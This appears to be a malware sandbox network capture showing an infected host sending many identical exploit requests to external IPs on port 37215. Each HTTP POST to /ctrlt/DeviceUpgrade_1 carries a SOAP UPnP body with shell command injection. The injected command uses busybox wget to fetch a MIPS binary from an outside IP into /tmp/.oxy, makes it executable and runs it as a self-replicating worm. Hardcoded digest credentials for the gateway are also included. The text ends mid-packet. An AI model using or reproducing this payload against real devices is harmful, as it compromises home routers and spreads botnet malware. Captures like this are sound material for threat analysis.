                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.1340844171.114.236.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652738094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.135567241.230.206.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652767897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  48192.168.2.134082041.200.75.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652767897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.134706847.66.136.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652767897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.135807887.196.57.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652815104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  51192.168.2.1359314157.200.19.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652858019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  52192.168.2.1344238197.52.74.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652861118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  53192.168.2.1349520157.162.181.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652899981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  54192.168.2.1348570157.140.111.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652899981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  55192.168.2.133726241.254.106.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.652949095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 